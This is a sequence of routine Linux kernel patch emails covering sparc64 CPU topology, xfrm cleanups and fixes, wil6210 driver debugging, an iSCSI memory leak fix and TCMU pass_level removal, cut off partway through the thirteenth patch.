From acc455cffa75070d55e74fc7802b49edbc080e92 Mon Sep 17 00:00:00 2001 From: chris hyser Date: Wed, 22 Apr 2015 12:28:31 -0400 Subject: [PATCH 001/872] sparc64: Setup sysfs to mark LDOM sockets, cores and threads correctly commit 5f4826a362405748bbf73957027b77993e61e1af Author: chris hyser Date: Tue Apr 21 10:31:38 2015 -0400 sparc64: Setup sysfs to mark LDOM sockets, cores and threads correctly The current sparc kernel has no representation for sockets though tools like lscpu can pull this from sysfs. This patch walks the machine description cache and socket hierarchy and marks sockets as well as cores and threads such that a representative sysfs is created by drivers/base/topology.c. Before this patch: $ lscpu Architecture: sparc64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Big Endian CPU(s): 1024 On-line CPU(s) list: 0-1023 Thread(s) per core: 8 Core(s) per socket: 1 <--- wrong Socket(s): 128 <--- wrong NUMA node(s): 4 NUMA node0 CPU(s): 0-255 NUMA node1 CPU(s): 256-511 NUMA node2 CPU(s): 512-767 NUMA node3 CPU(s): 768-1023 After this patch: $ lscpu Architecture: sparc64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Big Endian CPU(s): 1024 On-line CPU(s) list: 0-1023 Thread(s) per core: 8 Core(s) per socket: 32 Socket(s): 4 NUMA node(s): 4 NUMA node0 CPU(s): 0-255 NUMA node1 CPU(s): 256-511 NUMA node2 CPU(s): 512-767 NUMA node3 CPU(s): 768-1023 Most of this patch was done by Chris with updates by David. Signed-off-by: Chris Hyser Signed-off-by: David Ahern Signed-off-by: David S. Miller --- arch/sparc/include/asm/cpudata_64.h | 3 +- arch/sparc/include/asm/topology_64.h | 3 +- arch/sparc/kernel/mdesc.c | 136 ++++++++++++++++++++++----- arch/sparc/kernel/smp_64.c | 13 +++ 4 files changed, 127 insertions(+), 28 deletions(-) diff --git a/arch/sparc/include/asm/cpudata_64.h b/arch/sparc/include/asm/cpudata_64.h index a6e424d185d0..a6cfdabb6054 100644 --- a/arch/sparc/include/asm/cpudata_64.h +++ b/arch/sparc/include/asm/cpudata_64.h @@ -24,7 +24,8 @@ typedef struct { unsigned int icache_line_size; unsigned int ecache_size; unsigned int ecache_line_size; - int core_id; + unsigned short sock_id; + unsigned short core_id; int proc_id; } cpuinfo_sparc; diff --git a/arch/sparc/include/asm/topology_64.h b/arch/sparc/include/asm/topology_64.h index ed8f071132e4..d1761df5cca6 100644 --- a/arch/sparc/include/asm/topology_64.h +++ b/arch/sparc/include/asm/topology_64.h @@ -40,11 +40,12 @@ static inline int pcibus_to_node(struct pci_bus *pbus) #ifdef CONFIG_SMP #define topology_physical_package_id(cpu) (cpu_data(cpu).proc_id) #define topology_core_id(cpu) (cpu_data(cpu).core_id) -#define topology_core_cpumask(cpu) (&cpu_core_map[cpu]) +#define topology_core_cpumask(cpu) (&cpu_core_sib_map[cpu]) #define topology_thread_cpumask(cpu) (&per_cpu(cpu_sibling_map, cpu)) #endif /* CONFIG_SMP */ extern cpumask_t cpu_core_map[NR_CPUS]; +extern cpumask_t cpu_core_sib_map[NR_CPUS]; static inline const struct cpumask *cpu_coregroup_mask(int cpu) { return &cpu_core_map[cpu]; diff --git a/arch/sparc/kernel/mdesc.c b/arch/sparc/kernel/mdesc.c index 26c80e18d7b1..6f80936e0eea 100644 --- a/arch/sparc/kernel/mdesc.c +++ b/arch/sparc/kernel/mdesc.c @@ -614,45 +614,68 @@ static void fill_in_one_cache(cpuinfo_sparc *c, struct mdesc_handle *hp, u64 mp) } } -static void mark_core_ids(struct mdesc_handle *hp, u64 mp, int core_id) +static void find_back_node_value(struct mdesc_handle *hp, u64 node, + char *srch_val, + void (*func)(struct mdesc_handle *, u64, int), + u64 val, int depth) { - u64 a; - - mdesc_for_each_arc(a, hp, mp, MDESC_ARC_TYPE_BACK) { - u64 t = mdesc_arc_target(hp, a); - const char *name; - const u64 *id; + u64 arc; - name = mdesc_node_name(hp, t); - if (!strcmp(name, "cpu")) { - id = mdesc_get_property(hp, t, "id", NULL); - if (*id < NR_CPUS) - cpu_data(*id).core_id = core_id; - } else { - u64 j; + /* Since we have an estimate of recursion depth, do a sanity check. */ + if (depth == 0) + return; - mdesc_for_each_arc(j, hp, t, MDESC_ARC_TYPE_BACK) { - u64 n = mdesc_arc_target(hp, j); - const char *n_name; + mdesc_for_each_arc(arc, hp, node, MDESC_ARC_TYPE_BACK) { + u64 n = mdesc_arc_target(hp, arc); + const char *name = mdesc_node_name(hp, n); - n_name = mdesc_node_name(hp, n); - if (strcmp(n_name, "cpu")) - continue; + if (!strcmp(srch_val, name)) + (*func)(hp, n, val); - id = mdesc_get_property(hp, n, "id", NULL); - if (*id < NR_CPUS) - cpu_data(*id).core_id = core_id; - } - } + find_back_node_value(hp, n, srch_val, func, val, depth-1); } } +static void __mark_core_id(struct mdesc_handle *hp, u64 node, + int core_id) +{ + const u64 *id = mdesc_get_property(hp, node, "id", NULL); + + if (*id < num_possible_cpus()) + cpu_data(*id).core_id = core_id; +} + +static void __mark_sock_id(struct mdesc_handle *hp, u64 node, + int sock_id) +{ + const u64 *id = mdesc_get_property(hp, node, "id", NULL); + + if (*id < num_possible_cpus()) + cpu_data(*id).sock_id = sock_id; +} + +static void mark_core_ids(struct mdesc_handle *hp, u64 mp, + int core_id) +{ + find_back_node_value(hp, mp, "cpu", __mark_core_id, core_id, 10); +} + +static void mark_sock_ids(struct mdesc_handle *hp, u64 mp, + int sock_id) +{ + find_back_node_value(hp, mp, "cpu", __mark_sock_id, sock_id, 10); +} + static void set_core_ids(struct mdesc_handle *hp) { int idx; u64 mp; idx = 1; + + /* Identify unique cores by looking for cpus backpointed to by + * level 1 instruction caches. + */ mdesc_for_each_node_by_name(hp, mp, "cache") { const u64 *level; const char *type; @@ -667,11 +690,72 @@ static void set_core_ids(struct mdesc_handle *hp) continue; mark_core_ids(hp, mp, idx); + idx++; + } +} + +static int set_sock_ids_by_cache(struct mdesc_handle *hp, int level) +{ + u64 mp; + int idx = 1; + int fnd = 0; + + /* Identify unique sockets by looking for cpus backpointed to by + * shared level n caches. + */ + mdesc_for_each_node_by_name(hp, mp, "cache") { + const u64 *cur_lvl; + + cur_lvl = mdesc_get_property(hp, mp, "level", NULL); + if (*cur_lvl != level) + continue; + + mark_sock_ids(hp, mp, idx); + idx++; + fnd = 1; + } + return fnd; +} + +static void set_sock_ids_by_socket(struct mdesc_handle *hp, u64 mp) +{ + int idx = 1; + mdesc_for_each_node_by_name(hp, mp, "socket") { + u64 a; + + mdesc_for_each_arc(a, hp, mp, MDESC_ARC_TYPE_FWD) { + u64 t = mdesc_arc_target(hp, a); + const char *name; + const u64 *id; + + name = mdesc_node_name(hp, t); + if (strcmp(name, "cpu")) + continue; + + id = mdesc_get_property(hp, t, "id", NULL); + if (*id < num_possible_cpus()) + cpu_data(*id).sock_id = idx; + } idx++; } } +static void set_sock_ids(struct mdesc_handle *hp) +{ + u64 mp; + + /* If machine description exposes sockets data use it. + * Otherwise fallback to use shared L3 or L2 caches. + */ + mp = mdesc_node_by_name(hp, MDESC_NODE_NULL, "sockets"); + if (mp != MDESC_NODE_NULL) + return set_sock_ids_by_socket(hp, mp); + + if (!set_sock_ids_by_cache(hp, 3)) + set_sock_ids_by_cache(hp, 2); +} + static void mark_proc_ids(struct mdesc_handle *hp, u64 mp, int proc_id) { u64 a; @@ -707,7 +791,6 @@ static void __set_proc_ids(struct mdesc_handle *hp, const char *exec_unit_name) continue; mark_proc_ids(hp, mp, idx); - idx++; } } @@ -900,6 +983,7 @@ void mdesc_fill_in_cpu_data(cpumask_t *mask) set_core_ids(hp); set_proc_ids(hp); + set_sock_ids(hp); mdesc_release(hp); diff --git a/arch/sparc/kernel/smp_64.c b/arch/sparc/kernel/smp_64.c index 61139d9924ca..19cd08d18672 100644 --- a/arch/sparc/kernel/smp_64.c +++ b/arch/sparc/kernel/smp_64.c @@ -60,8 +60,12 @@ DEFINE_PER_CPU(cpumask_t, cpu_sibling_map) = CPU_MASK_NONE; cpumask_t cpu_core_map[NR_CPUS] __read_mostly = { [0 ... NR_CPUS-1] = CPU_MASK_NONE }; +cpumask_t cpu_core_sib_map[NR_CPUS] __read_mostly = { + [0 ... NR_CPUS-1] = CPU_MASK_NONE }; + EXPORT_PER_CPU_SYMBOL(cpu_sibling_map); EXPORT_SYMBOL(cpu_core_map); +EXPORT_SYMBOL(cpu_core_sib_map); static cpumask_t smp_commenced_mask; @@ -1243,6 +1247,15 @@ void smp_fill_in_sib_core_maps(void) } } + for_each_present_cpu(i) { + unsigned int j; + + for_each_present_cpu(j) { + if (cpu_data(i).sock_id == cpu_data(j).sock_id) + cpumask_set_cpu(j, &cpu_core_sib_map[i]); + } + } + for_each_present_cpu(i) { unsigned int j; From 1ee5e6676bccbf7a035d8d35c143f1a61e602198 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Wed, 22 Apr 2015 15:51:16 +0800 Subject: [PATCH 002/872] xfrm: remove the xfrm_queue_purge definition The task of xfrm_queue_purge is same as skb_queue_purge, so remove it Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 638af0655aaf..d8c35ad4210d 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -315,14 +315,6 @@ void xfrm_policy_destroy(struct xfrm_policy *policy) } EXPORT_SYMBOL(xfrm_policy_destroy); -static void xfrm_queue_purge(struct sk_buff_head *list) -{ - struct sk_buff *skb; - - while ((skb = skb_dequeue(list)) != NULL) - kfree_skb(skb); -} - /* Rule must be locked. Release descentant resources, announce * entry dead. The rule must be unlinked from lists to the moment. */ @@ -335,7 +327,7 @@ static void xfrm_policy_kill(struct xfrm_policy *policy) if (del_timer(&policy->polq.hold_timer)) xfrm_pol_put(policy); - xfrm_queue_purge(&policy->polq.hold_queue); + skb_queue_purge(&policy->polq.hold_queue); if (del_timer(&policy->timer)) xfrm_pol_put(policy); @@ -1955,7 +1947,7 @@ static void xfrm_policy_queue_process(unsigned long arg) purge_queue: pq->timeout = 0; - xfrm_queue_purge(&pq->hold_queue); + skb_queue_purge(&pq->hold_queue); xfrm_pol_put(pol); } From 800777026eeb33585f29608c2c6131fc66d2e218 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Wed, 22 Apr 2015 17:09:54 +0800 Subject: [PATCH 003/872] xfrm: optimise the use of walk list header in xfrm_policy/state_walk The walk from input is the list header, and marked as dead, and will be skipped in loop. list_first_entry() can be used to return the true usable value from walk if walk is not empty Signed-off-by: Li RongQing Acked-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 4 +++- net/xfrm/xfrm_state.c | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index d8c35ad4210d..847053ec7d91 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -1004,7 +1004,9 @@ int xfrm_policy_walk(struct net *net, struct xfrm_policy_walk *walk, if (list_empty(&walk->walk.all)) x = list_first_entry(&net->xfrm.policy_all, struct xfrm_policy_walk_entry, all); else - x = list_entry(&walk->walk.all, struct xfrm_policy_walk_entry, all); + x = list_first_entry(&walk->walk.all, + struct xfrm_policy_walk_entry, all); + list_for_each_entry_from(x, &net->xfrm.policy_all, all) { if (x->dead) continue; diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c index f5e39e35d73a..df9318301e98 100644 --- a/net/xfrm/xfrm_state.c +++ b/net/xfrm/xfrm_state.c @@ -1626,7 +1626,7 @@ int xfrm_state_walk(struct net *net, struct xfrm_state_walk *walk, if (list_empty(&walk->all)) x = list_first_entry(&net->xfrm.state_all, struct xfrm_state_walk, all); else - x = list_entry(&walk->all, struct xfrm_state_walk, all); + x = list_first_entry(&walk->all, struct xfrm_state_walk, all); list_for_each_entry_from(x, &net->xfrm.state_all, all) { if (x->state == XFRM_STATE_DEAD) continue; From f31e8d4f7b44092b6b2ab3a6b1d4079836b6955a Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 23 Apr 2015 11:06:53 +0800 Subject: [PATCH 004/872] xfrm: fix the return code when xfrm_*_register_afinfo failed If xfrm_*_register_afinfo failed since xfrm_*_afinfo[afinfo->family] had the value, return the -EEXIST, not -ENOBUFS Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_input.c | 2 +- net/xfrm/xfrm_policy.c | 2 +- net/xfrm/xfrm_state.c | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c index 526c4feb3b50..459796a78ab0 100644 --- a/net/xfrm/xfrm_input.c +++ b/net/xfrm/xfrm_input.c @@ -29,7 +29,7 @@ int xfrm_input_register_afinfo(struct xfrm_input_afinfo *afinfo) return -EAFNOSUPPORT; spin_lock_bh(&xfrm_input_afinfo_lock); if (unlikely(xfrm_input_afinfo[afinfo->family] != NULL)) - err = -ENOBUFS; + err = -EEXIST; else rcu_assign_pointer(xfrm_input_afinfo[afinfo->family], afinfo); spin_unlock_bh(&xfrm_input_afinfo_lock); diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 847053ec7d91..c4c47f337a3a 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -2808,7 +2808,7 @@ int xfrm_policy_register_afinfo(struct xfrm_policy_afinfo *afinfo) return -EAFNOSUPPORT; spin_lock(&xfrm_policy_afinfo_lock); if (unlikely(xfrm_policy_afinfo[afinfo->family] != NULL)) - err = -ENOBUFS; + err = -EEXIST; else { struct dst_ops *dst_ops = afinfo->dst_ops; if (likely(dst_ops->kmem_cachep == NULL)) diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c index df9318301e98..e47e4980b35c 100644 --- a/net/xfrm/xfrm_state.c +++ b/net/xfrm/xfrm_state.c @@ -1908,7 +1908,7 @@ int xfrm_state_register_afinfo(struct xfrm_state_afinfo *afinfo) return -EAFNOSUPPORT; spin_lock_bh(&xfrm_state_afinfo_lock); if (unlikely(xfrm_state_afinfo[afinfo->family] != NULL)) - err = -ENOBUFS; + err = -EEXIST; else rcu_assign_pointer(xfrm_state_afinfo[afinfo->family], afinfo); spin_unlock_bh(&xfrm_state_afinfo_lock); From dc0565ce6e34be06730312e79b226b7408a543c8 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Fri, 24 Apr 2015 16:49:31 +0800 Subject: [PATCH 005/872] xfrm: slightly optimise xfrm_input Check x->km.state with XFRM_STATE_ACQ only when state is not XFRM_STAT_VALID, not everytime Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_input.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c index 459796a78ab0..1858a45f008b 100644 --- a/net/xfrm/xfrm_input.c +++ b/net/xfrm/xfrm_input.c @@ -239,13 +239,13 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) skb->sp->xvec[skb->sp->len++] = x; spin_lock(&x->lock); - if (unlikely(x->km.state == XFRM_STATE_ACQ)) { - XFRM_INC_STATS(net, LINUX_MIB_XFRMACQUIREERROR); - goto drop_unlock; - } if (unlikely(x->km.state != XFRM_STATE_VALID)) { - XFRM_INC_STATS(net, LINUX_MIB_XFRMINSTATEINVALID); + if (x->km.state == XFRM_STATE_ACQ) + XFRM_INC_STATS(net, LINUX_MIB_XFRMACQUIREERROR); + else + XFRM_INC_STATS(net, + LINUX_MIB_XFRMINSTATEINVALID); goto drop_unlock; } From bfc2dc7a69a41ba5ee268dac2c464d6b0e50eba7 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:50 +0300 Subject: [PATCH 006/872] wil6210: fw debug mode refactor module parameter debug_fw to act as "fw debug mode", where driver do nothing but allow card memory access. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/main.c | 15 +++++++++++++++ drivers/net/wireless/ath/wil6210/netdev.c | 5 +++++ drivers/net/wireless/ath/wil6210/pcie_bus.c | 6 ------ drivers/net/wireless/ath/wil6210/wil6210.h | 1 + 4 files changed, 21 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index c2a238426425..0623d8c98956 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -25,6 +25,10 @@ #define WAIT_FOR_DISCONNECT_TIMEOUT_MS 2000 #define WAIT_FOR_DISCONNECT_INTERVAL_MS 10 +bool debug_fw; /* = false; */ +module_param(debug_fw, bool, S_IRUGO); +MODULE_PARM_DESC(debug_fw, " do not perform card reset. For FW debug"); + bool no_fw_recovery; module_param(no_fw_recovery, bool, S_IRUGO | S_IWUSR); MODULE_PARM_DESC(no_fw_recovery, " disable automatic FW error recovery"); @@ -686,6 +690,17 @@ int wil_reset(struct wil6210_priv *wil, bool load_fw) WARN_ON(!mutex_is_locked(&wil->mutex)); WARN_ON(test_bit(wil_status_napi_en, wil->status)); + if (debug_fw) { + static const u8 mac[ETH_ALEN] = { + 0x00, 0xde, 0xad, 0x12, 0x34, 0x56, + }; + struct net_device *ndev = wil_to_ndev(wil); + + ether_addr_copy(ndev->perm_addr, mac); + ether_addr_copy(ndev->dev_addr, ndev->perm_addr); + return 0; + } + cancel_work_sync(&wil->disconnect_worker); wil6210_disconnect(wil, NULL, WLAN_REASON_DEAUTH_LEAVING, false); wil_bcast_fini(wil); diff --git a/drivers/net/wireless/ath/wil6210/netdev.c b/drivers/net/wireless/ath/wil6210/netdev.c index f2f7ea29558e..6042f61b016c 100644 --- a/drivers/net/wireless/ath/wil6210/netdev.c +++ b/drivers/net/wireless/ath/wil6210/netdev.c @@ -24,6 +24,11 @@ static int wil_open(struct net_device *ndev) wil_dbg_misc(wil, "%s()\n", __func__); + if (debug_fw) { + wil_err(wil, "%s() while in debug_fw mode\n", __func__); + return -EINVAL; + } + return wil_up(wil); } diff --git a/drivers/net/wireless/ath/wil6210/pcie_bus.c b/drivers/net/wireless/ath/wil6210/pcie_bus.c index 109986114abf..58c79166a6d1 100644 --- a/drivers/net/wireless/ath/wil6210/pcie_bus.c +++ b/drivers/net/wireless/ath/wil6210/pcie_bus.c @@ -27,10 +27,6 @@ MODULE_PARM_DESC(use_msi, " Use MSI interrupt: " "0 - don't, 1 - (default) - single, or 3"); -static bool debug_fw; /* = false; */ -module_param(debug_fw, bool, S_IRUGO); -MODULE_PARM_DESC(debug_fw, " load driver if FW not ready. For FW debug"); - static void wil_set_capabilities(struct wil6210_priv *wil) { @@ -133,8 +129,6 @@ static int wil_if_pcie_enable(struct wil6210_priv *wil) mutex_lock(&wil->mutex); rc = wil_reset(wil, false); mutex_unlock(&wil->mutex); - if (debug_fw) - rc = 0; if (rc) goto release_irq; diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index 4310972c9e16..f4681e3975ff 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -29,6 +29,7 @@ extern unsigned short rx_ring_overflow_thrsh; extern int agg_wsize; extern u32 vring_idle_trsh; extern bool rx_align_2; +extern bool debug_fw; #define WIL_NAME "wil6210" #define WIL_FW_NAME "wil6210.fw" /* code */ From db8adcbf5e7a0d5e6577b53214e6655b81cea9df Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:51 +0300 Subject: [PATCH 007/872] wil6210: debug [add|del]_key operations Provide info for [add|del]_key. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index b97172667bc7..6cc432d0b663 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -569,6 +569,9 @@ static int wil_cfg80211_add_key(struct wiphy *wiphy, { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, + pairwise ? "PTK" : "GTK"); + /* group key is not used */ if (!pairwise) return 0; @@ -584,6 +587,9 @@ static int wil_cfg80211_del_key(struct wiphy *wiphy, { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, + pairwise ? "PTK" : "GTK"); + /* group key is not used */ if (!pairwise) return 0; From de9084ef47eb4014a7ca3ccbffce285ddc2130ce Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:52 +0300 Subject: [PATCH 008/872] wil6210: trace disconnect source Trace where wil6210_disconnect() is called from. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index 6cc432d0b663..37d5338ecfc7 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -507,6 +507,8 @@ static int wil_cfg80211_disconnect(struct wiphy *wiphy, int rc; struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(reason=%d)\n", __func__, reason_code); + rc = wmi_send(wil, WMI_DISCONNECT_CMDID, NULL, 0); return rc; @@ -836,6 +838,9 @@ static int wil_cfg80211_del_station(struct wiphy *wiphy, { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + wil_dbg_misc(wil, "%s(%pM, reason=%d)\n", __func__, params->mac, + params->reason_code); + mutex_lock(&wil->mutex); wil6210_disconnect(wil, params->mac, params->reason_code, false); mutex_unlock(&wil->mutex); From e853c93bd8e2d92c6586ceed15542c21c8766d54 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:53 +0300 Subject: [PATCH 009/872] wil6210: stop_ap to leave interface closed cfg80211_ops.stop_ap supposed to have interface carried turned off as post condition. Fulfill this requirement. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 4 ---- 1 file changed, 4 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index 37d5338ecfc7..ea331e407e7f 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -822,13 +822,9 @@ static int wil_cfg80211_stop_ap(struct wiphy *wiphy, wmi_pcp_stop(wil); __wil_down(wil); - __wil_up(wil); mutex_unlock(&wil->mutex); - /* some functions above might fail (e.g. __wil_up). Nevertheless, we - * return success because AP has stopped - */ return 0; } From 137ce6104ffec1a86c8c14daf1cca15f8ef29d2c Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 30 Mar 2015 11:28:54 +0300 Subject: [PATCH 010/872] wil6210: update FW file name Firmware "board" file name has changed from wil6210.board to wil6210.brd by the FW generation tools. Reflect this in the driver. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/wil6210.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index f4681e3975ff..abb2080d3fa1 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -33,7 +33,7 @@ extern bool debug_fw; #define WIL_NAME "wil6210" #define WIL_FW_NAME "wil6210.fw" /* code */ -#define WIL_FW2_NAME "wil6210.board" /* board & radio parameters */ +#define WIL_FW2_NAME "wil6210.brd" /* board & radio parameters */ #define WIL_MAX_BUS_REQUEST_KBPS 800000 /* ~6.1Gbps */ From bdddbf6996c0b9299efc97b8f66e06286f3aa8c9 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Wed, 29 Apr 2015 08:42:44 +0800 Subject: [PATCH 011/872] xfrm: fix a race in xfrm_state_lookup_byspi The returned xfrm_state should be hold before unlock xfrm_state_lock, otherwise the returned xfrm_state maybe be released. Fixes: c454997e6[{pktgen, xfrm} Introduce xfrm_state_lookup_byspi..] Cc: Fan Du Signed-off-by: Li RongQing Acked-by: Fan Du Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_state.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c index f5e39e35d73a..96688cd0f6f1 100644 --- a/net/xfrm/xfrm_state.c +++ b/net/xfrm/xfrm_state.c @@ -927,8 +927,8 @@ struct xfrm_state *xfrm_state_lookup_byspi(struct net *net, __be32 spi, x->id.spi != spi) continue; - spin_unlock_bh(&net->xfrm.xfrm_state_lock); xfrm_state_hold(x); + spin_unlock_bh(&net->xfrm.xfrm_state_lock); return x; } spin_unlock_bh(&net->xfrm.xfrm_state_lock); From a928d28d4487402e6bd18bea1b8cc2b2ec6e6d8f Mon Sep 17 00:00:00 2001 From: Evgenii Lepikhin Date: Tue, 21 Apr 2015 15:49:57 +0300 Subject: [PATCH 012/872] ISCSI: fix minor memory leak This patch adds a missing kfree for sess->sess_ops memory upon transport_init_session() failure. Signed-off-by: Evgenii Lepikhin Signed-off-by: Nicholas Bellinger --- drivers/target/iscsi/iscsi_target_login.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/target/iscsi/iscsi_target_login.c b/drivers/target/iscsi/iscsi_target_login.c index 8ce94ff744e6..70d799dfab03 100644 --- a/drivers/target/iscsi/iscsi_target_login.c +++ b/drivers/target/iscsi/iscsi_target_login.c @@ -346,6 +346,7 @@ static int iscsi_login_zero_tsih_s1( if (IS_ERR(sess->se_sess)) { iscsit_tx_login_rsp(conn, ISCSI_STATUS_CLS_TARGET_ERR, ISCSI_LOGIN_STATUS_NO_RESOURCES); + kfree(sess->sess_ops); kfree(sess); return -ENOMEM; } From 8ee83a747ac2309934c229281dda8f26648ec462 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Fri, 1 May 2015 10:43:45 -0700 Subject: [PATCH 013/872] target/user: Disallow full passthrough (pass_level=0) TCMU requires more work to correctly handle both user handlers that want all SCSI commands (pass_level=0) for a se_device, and also handlers that just want I/O commands and let the others be emulated by the kernel (pass_level=1). Only support the latter for now. For full passthrough, we will need to support a second se_subsystem_api template, due to configfs attributes being different between the two modes. Thus pass_level is extraneous, and we can remove it. The ABI break for TCMU v2 is already applied for this release, so it's best to do this now to avoid another ABI break in the future. Signed-off-by: Andy Grover Reviewed-by: Christoph Hellwig Signed-off-by: Nicholas Bellinger --- Documentation/target/tcmu-design.txt | 18 +++----- drivers/target/target_core_user.c | 68 ++-------------------------- 2 files changed, 10 insertions(+), 76 deletions(-) diff --git a/Documentation/target/tcmu-design.txt b/Documentation/target/tcmu-design.txt index 43e94ea6d2ca..c80bf1ed8981 100644 --- a/Documentation/target/tcmu-design.txt +++ b/Documentation/target/tcmu-design.txt @@ -15,7 +15,7 @@ Contents: a) Discovering and configuring TCMU uio devices b) Waiting for events on the device(s) c) Managing the command ring -3) Command filtering and pass_level +3) Command filtering 4) A final note @@ -360,17 +360,13 @@ int handle_device_events(int fd, void *map) } -Command filtering and pass_level --------------------------------- +Command filtering +----------------- -TCMU supports a "pass_level" option with valid values of 0 or 1. When -the value is 0 (the default), nearly all SCSI commands received for -the device are passed through to the handler. This allows maximum -flexibility but increases the amount of code required by the handler, -to support all mandatory SCSI commands. If pass_level is set to 1, -then only IO-related commands are presented, and the rest are handled -by LIO's in-kernel command emulation. The commands presented at level -1 include all versions of: +Initial TCMU support is for a filtered commandset. Only IO-related +commands are presented to userspace, and the rest are handled by LIO's +in-kernel command emulation. The commands presented are all versions +of: READ WRITE diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index dbc872a6c981..0e0feeaec39c 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -71,13 +71,6 @@ struct tcmu_hba { u32 host_id; }; -/* User wants all cmds or just some */ -enum passthru_level { - TCMU_PASS_ALL = 0, - TCMU_PASS_IO, - TCMU_PASS_INVALID, -}; - #define TCMU_CONFIG_LEN 256 struct tcmu_dev { @@ -89,7 +82,6 @@ struct tcmu_dev { #define TCMU_DEV_BIT_OPEN 0 #define TCMU_DEV_BIT_BROKEN 1 unsigned long flags; - enum passthru_level pass_level; struct uio_info uio_info; @@ -683,8 +675,6 @@ static struct se_device *tcmu_alloc_device(struct se_hba *hba, const char *name) setup_timer(&udev->timeout, tcmu_device_timedout, (unsigned long)udev); - udev->pass_level = TCMU_PASS_ALL; - return &udev->se_dev; } @@ -948,13 +938,12 @@ static void tcmu_free_device(struct se_device *dev) } enum { - Opt_dev_config, Opt_dev_size, Opt_err, Opt_pass_level, + Opt_dev_config, Opt_dev_size, Opt_err, }; static match_table_t tokens = { {Opt_dev_config, "dev_config=%s"}, {Opt_dev_size, 